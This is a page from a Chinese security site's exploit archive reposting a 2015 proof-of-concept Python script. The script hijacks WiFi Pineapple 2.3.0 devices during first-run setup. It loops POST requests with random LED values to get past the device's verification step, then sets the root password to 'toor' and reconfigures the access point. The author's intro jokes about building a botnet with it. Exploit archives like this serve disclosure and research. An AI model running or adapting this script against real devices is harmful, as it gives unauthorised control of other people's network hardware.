首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pineapple 2.3.0 Autopwn Script
来源:mailto at zensecurity.su 作者:Mind 发布时间:2015-08-11  
I have wrote PoC half a year ago, because i needed to try it on my Chinese router, and it still works on freshly purchased pineapple devices. (hello from Defcon ;) )
And guys, it’s not a talk for the defcon, especially if you have done a botnet based on that shit… ;)
See ya tomorrow at WiFi village...

POC is below:


#!/usr/bin/env python

from random import choice
from urllib import urlencode
from httplib import HTTPConnection


settings = {
    "ip": "172.16.42.1",
    "port": 1471,
    "root_password": "toor",
    "ap_ssid": "AccessPoint",
    "ap_password": "password"
}

parameters = ('amber', 'blue', 'red',)
values = ('on', 'off', 'blink',)

connection = HTTPConnection(settings["ip"], settings["port"])
php_session = ""

while True:
    post_data = "{}&verify_pineapple=true".format(urlencode(dict((parameter, choice(values),) for parameter in parameters)))
    connection.request("POST", "/?action=verify_pineapple", post_data, {"Content-type": "application/x-www-form-urlencoded", "Connection": "keep-alive", "Cookie" : php_session})
    response = connection.getresponse()
    php_session = php_session or response.getheader("set-cookie").split(";")[0]
    if "action=set_password" in response.read():
      connection.request("POST", "/?action=set_password", "password={0}&password2={0}&set_password=true&eula=true&sw_license=true".format(settings["root_password"]), {"Content-type": "application/x-www-form-urlencoded", "Cookie": php_session})
      connection.getresponse().read()
      connection.request("POST", "/?action=set_ssid", "ssid={0}&password={1}&password2={1}&set_ssid=true".format(settings["ap_ssid"], settings["ap_password"]), {"Content-type": "application/x-www-form-urlencoded", "Cookie": php_session})
      connection.getresponse().read()
      connection.request("GET", "/?action=finish")
      print "Setup finished"
      break





 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP SplDoublyLinkedList Use-Af
·Havij Pro - Crash POC
·PHP SplObjectStorage Use-After
·NeuroServer 0.7.4 Denial Of Se
·PHP SPL ArrayObject Use-After-
·PDF Shaper Buffer Overflow
·Tomabo MP4 Player 3.11.3 SEH B
·Java Secure Socket Extension (
·Linux/x86 Memory Sinkhole Proo
·Microsoft Internet Explorer CT
·FileZilla Client 2.2.x SEH Buf
·Microsoft HTML Help Compiler 4
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved